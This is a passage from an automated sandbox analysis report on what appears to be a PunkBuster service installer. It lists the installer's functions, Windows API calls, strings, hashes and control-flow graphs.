                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$DeleteSelect$CreateIconIndirect$A16180
                                              • String ID:
                                              • API String ID: 224736987-0
                                              • Opcode ID: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction ID: 094c13db3d56746c6d184d65fef74c142a1e1cab74018fb28d94c467a2b62b3a
                                              • Opcode Fuzzy Hash: 3031b414493fbf99951924072cac3069245b3430f50ba7b56301bf550f7ad484
                                              • Instruction Fuzzy Hash: 237148B1A04340AFC750DF29D980B6BBBE5AB88B50F14596EF989CB351D7B8DC00CB56
                                              Function 004C631B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 619 4c631b-4c633f 620 4c6341-4c6348 619->620 621 4c634a-4c634e 620->621 622 4c6350-4c635b 620->622 621->620 621->622 623 4c6476-4c6491 call 4bc19b 622->623 624 4c6361-4c6369 622->624 626 4c644e-4c6470 call 4bba60 GetStdHandle WriteFile 624->626 627 4c636f-4c6371 624->627 626->623 630 4c6380-4c6386 627->630 631 4c6373-4c637a 627->631 630->623 632 4c638c-4c63a4 GetModuleFileNameA 630->632 631->626 631->630 634 4c63b6-4c63c6 call 4bba60 632->634 635 4c63a6-4c63b5 call 4bc410 632->635 640 4c63c8-4c63e7 call 4bba60 call 4bc810 634->640 641 4c63ea-4c644c call 4bba60 * 2 call 4bc670 call 4bc410 call 4bc420 * 3 call 4c8324 634->641 635->634 640->641 641->623
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004C639C
                                              • _strlen.LIBCMT ref: 004C63BC
                                              • _strlen.LIBCMT ref: 004C63CB
                                              • _strlen.LIBCMT ref: 004C63EB
                                              • _strlen.LIBCMT ref: 004C63F8
                                              • _strlen.LIBCMT ref: 004C645E
                                              • GetStdHandle.KERNEL32(000000F4,00510140,00000000,?,00000000,00000000,00000000,00000000), ref: 004C6469
                                              • WriteFile.KERNEL32(00000000), ref: 004C6470
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _strlen$File$HandleModuleNameWrite
                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                              • API String ID: 1978235431-4022980321
                                              • Opcode ID: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction ID: 3b83ceba6bd0bb7fa69833b27816d898b07064a94b1dc6de9f3a03ce7699dd3e
                                              • Opcode Fuzzy Hash: d38d5b1406307b8c0532007b35fc3c9b6b7cde0ff306e2b280a830a180febb02
                                              • Instruction Fuzzy Hash: 4231F3765002446ADB24AA758CC6FFE3769EB44308F14882FF952D62A2DE7C9651C72C
                                              Function 0040725C Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 114serviceCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00407261
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407283
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 004072F9
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407360
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407363
                                              Strings
                                              • Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service., xrefs: 00407312
                                              • Uninstall canceled. WARNING: The service was *NOT* completely removed., xrefs: 00407375
                                              • Message, xrefs: 0040728F
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 0040729C
                                              • PnkBstrA, xrefs: 004072F3
                                              • Installation Canceled, xrefs: 00407305
                                              • Uninstall Canceled, xrefs: 00407368
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Installation Canceled$Installation canceled. WARNING: The service was *NOT* installed. PunkBuster will not operate correctly without this service.$Message$PnkBstrA$Uninstall Canceled$Uninstall canceled. WARNING: The service was *NOT* completely removed.
                                              • API String ID: 4214099978-2742951679
                                              • Opcode ID: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction ID: 7c7ffd2bd437f43fbd6496351136866b800a351aa3a6ac2ed06033c121d4f1a4
                                              • Opcode Fuzzy Hash: 4f6ecb782988e2b6a3b57c5b7547f7bb93300018e594aa3dc937bf7fb3d4cfa2
                                              • Instruction Fuzzy Hash: 1A41D770D00259AADB00F7A5CD86EFEB7749B10324F60426EE521731D2DB781B05C66A
                                              Function 004082BE Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141encryptionmemorytimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,00000000), ref: 0040833E
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00408351
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000001,00000000,00000000,?), ref: 00408374
                                              • LocalFree.KERNEL32(?), ref: 004083A4
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 004083B9
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 004083C8
                                              • CertGetNameStringA.CRYPT32(?,00000004,00000000,00000000,00000000,?), ref: 004083E6
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408423
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408436
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CertNameStringTime$Local$AllocFileSystem$Free
                                              • String ID: %02x $Too Large
                                              • API String ID: 1769289905-1084305061
                                              • Opcode ID: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction ID: 6f341e6902c4afdf672d8c9355eb800609bd8c5a6837686ba94cd697f7e6a9e9
                                              • Opcode Fuzzy Hash: b3e0cd638cfef40fa12e70ebb89416793cda090c0583f4495964a5423ace2b5b
                                              • Instruction Fuzzy Hash: 4E51327194025AAFDB219F64CC81FEDB7F8AF08354F0444BAF988A7291D6749E908F58
                                              Function 00409975 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 124serviceCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040997A
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00409A16
                                              • OpenServiceA.ADVAPI32(00000000,PnkBstrA,000F01FF), ref: 00409AB5
                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00409B16
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00409B1E
                                              Strings
                                              • Message, xrefs: 00409A37
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004099BA
                                              • Battlefield Bad Company 2, xrefs: 004099A3
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004099C1
                                              • **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer., xrefs: 00409A47
                                              • PnkBstrA, xrefs: 00409AAF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandleOpen$H_prologManager
                                              • String ID: **ERROR: Cannot open a handle to the service control manager. Please make sure you are the administrator for this computer.$Battlefield Bad Company 2$Message$PnkBstrA$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3
                                              • API String ID: 4214099978-78031187
                                              • Opcode ID: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction ID: 2e18fc910cd73181aa8cc253c752e22f79e2d0258fc9b51ea5b6ac68f69cd406
                                              • Opcode Fuzzy Hash: b44dd2765731aa001f42abd8448489a8d6e3d9e1b7effa639c836654f9df17bb
                                              • Instruction Fuzzy Hash: EE4173B0A402589FD710EB65CC85FEA77B4AF58304F0040BEF50AA7292DB795E85CB69
                                              Function 00439740 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 773 439740-439757 774 439891-439899 773->774 775 43975d-439760 773->775 775->774 776 439766-43976b 775->776 777 439777-43977c 776->777 778 43976d-439774 DeleteObject 776->778 779 439784-439787 777->779 780 43977e-439782 777->780 778->777 781 43978b-43978d 779->781 780->781 782 439795-439798 781->782 783 43978f-439793 781->783 784 43979c-439804 73A16180 73A14C40 * 2 782->784 783->784 788 439806 784->788 789 439809-439819 SelectObject 784->789 788->789 790 43981b 789->790 791 43981f-439830 SelectObject 789->791 790->791 792 439832-439836 791->792 793 439838-43983e 791->793 795 439867-43988e SelectObject DeleteDC SelectObject DeleteDC 792->795 794 439840-439861 SetBkColor 73A14D40 793->794 793->795 794->795
                                              APIs
                                              • DeleteObject.GDI32(?), ref: 0043976E
                                              • 73A16180.GDI32(?,?,00000001,00000001,00000000,?,?), ref: 004397DF
                                              • 73A14C40.GDI32(00000000,?,?), ref: 004397F0
                                              • 73A14C40.GDI32(00000000,?,?), ref: 004397F6
                                              • SelectObject.GDI32(00000000,00000000), ref: 00439811
                                              • SelectObject.GDI32(00000000,?), ref: 00439828
                                              • SetBkColor.GDI32(00000000,00000000), ref: 00439842
                                              • 73A14D40.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 00439861
                                              • SelectObject.GDI32(00000000,?), ref: 0043986D
                                              • DeleteDC.GDI32(00000000), ref: 00439876
                                              • SelectObject.GDI32(00000000,?), ref: 0043987E
                                              • DeleteDC.GDI32(00000000), ref: 00439881
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Select$Delete$A16180Color
                                              • String ID:
                                              • API String ID: 889182881-0
                                              • Opcode ID: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction ID: 49661b4580e29581968163e5db868791f49a386c690e782eba182ce59999159b
                                              • Opcode Fuzzy Hash: ccb191d75c6a88419337b361c2f1c9a35ab3d4fcbf024475c7a481866e01d812
                                              • Instruction Fuzzy Hash: AA417935644350AFD300DF54D884F6BBBE8BB8DB00F14855AF9889B342C7B8EC058BA6
                                              Function 004079B5 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 273COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 796 4079b5-4079cd call 4bc0f4 799 4079d3-407a14 call 4078b6 call 401072 call 49daa0 call 401028 796->799 800 407d76-407d82 796->800 809 407a16 799->809 810 407a1d-407a4b call 401072 call 49daa0 call 401028 799->810 809->810 817 407a5b-407a8d call 401072 call 49daa0 call 401028 810->817 818 407a4d-407a54 810->818 827 407a93-407abe call 401072 call 49daa0 817->827 828 407b79-407bab call 401072 call 49daa0 call 401028 817->828 818->817 820 407a56 call 406fe1 818->820 820->817 838 407ac0-407ae8 call 401072 call 49daa0 827->838 839 407aee 827->839 845 407bb1-407bd9 call 401072 call 49daa0 828->845 846 407ca9-407cdb call 401072 call 49daa0 call 401028 828->846 838->839 860 407aea-407aec 838->860 840 407af0-407af7 839->840 843 407b05-407b0c 840->843 844 407af9-407b00 call 401028 840->844 850 407b1a-407b1c 843->850 851 407b0e-407b15 call 401028 843->851 844->843 867 407c09 845->867 868 407bdb-407c07 call 401072 call 49daa0 845->868 877 407ce9-407d26 call 401072 call 49dae0 call 401028 846->877 878 407cdd-407ce2 846->878 856 407b6d-407b72 850->856 857 407b1e-407b68 call 401072 * 2 call 42a430 call 401028 850->857 851->850 856->828 897 407c85-407c8c call 401028 call 4bc330 857->897 860->840 873 407c0d-407c13 867->873 868->867 868->873 879 407c21-407c28 873->879 880 407c15-407c1c call 401028 873->880 907 407d34-407d68 call 401072 call 49daa0 call 401028 877->907 908 407d28-407d2d 877->908 878->877 885 407c32-407c36 879->885 886 407c2a-407c2d call 401028 879->886 880->879 891 407c91-407ca2 885->891 892 407c38-407c82 call 401072 * 2 call 42a430 call 401028 885->892 886->885 891->846 892->897 897->891 907->800 918 407d6a-407d6f 907->918 908->907 918->800
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004079BA
                                                • Part of subcall function 004079B5: __EH_prolog.LIBCMT ref: 004078BB
                                              Strings
                                              • install-nooverwrite, xrefs: 00407D34
                                              • **ERROR: You must specify install or un-install when using the no-display command-line switch., xrefs: 00407C45
                                              • Message, xrefs: 00407938, 00407B1E, 00407C38
                                              • no-display, xrefs: 00407B79
                                              • no-prompts, xrefs: 00407A5B
                                              • skip-tests, xrefs: 00407CA9
                                              • **ERROR: You must specify install or un-install when using the no-prompts command-line switch., xrefs: 00407B2E
                                              • **ERROR: Error in command-line option specified., xrefs: 00407925, 00407945
                                              • install-dlls, xrefs: 00407CE9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: **ERROR: You must specify install or un-install when using the no-display command-line switch.$ **ERROR: You must specify install or un-install when using the no-prompts command-line switch.$ **ERROR: Error in command-line option specified.$Message$install-dlls$install-nooverwrite$no-display$no-prompts$skip-tests
                                              • API String ID: 3519838083-2197801583
                                              • Opcode ID: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction ID: b915994dbbd29f52d1ea4df70baef6de42778e44b1b756d3316263f1e49830fe
                                              • Opcode Fuzzy Hash: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction Fuzzy Hash: AEB1A130D05289EEDB00EF61C945BED7BB4AF11304F50406FE885272E2DBB86B49CB99
                                              Function 00401DA2 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00401DA7
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                              Strings
                                              • dialog, xrefs: 00401DB6
                                              • button, xrefs: 00401F6A, 00402012
                                              • I &Agree, xrefs: 00401F7B
                                              • n, xrefs: 00402055
                                              • SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t, xrefs: 00401F20
                                              • text, xrefs: 00401E79
                                              • PunkBuster End User License Agreement, xrefs: 00401DCA
                                              • I &Disagree, xrefs: 00402023
                                              • , xrefs: 0040206C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
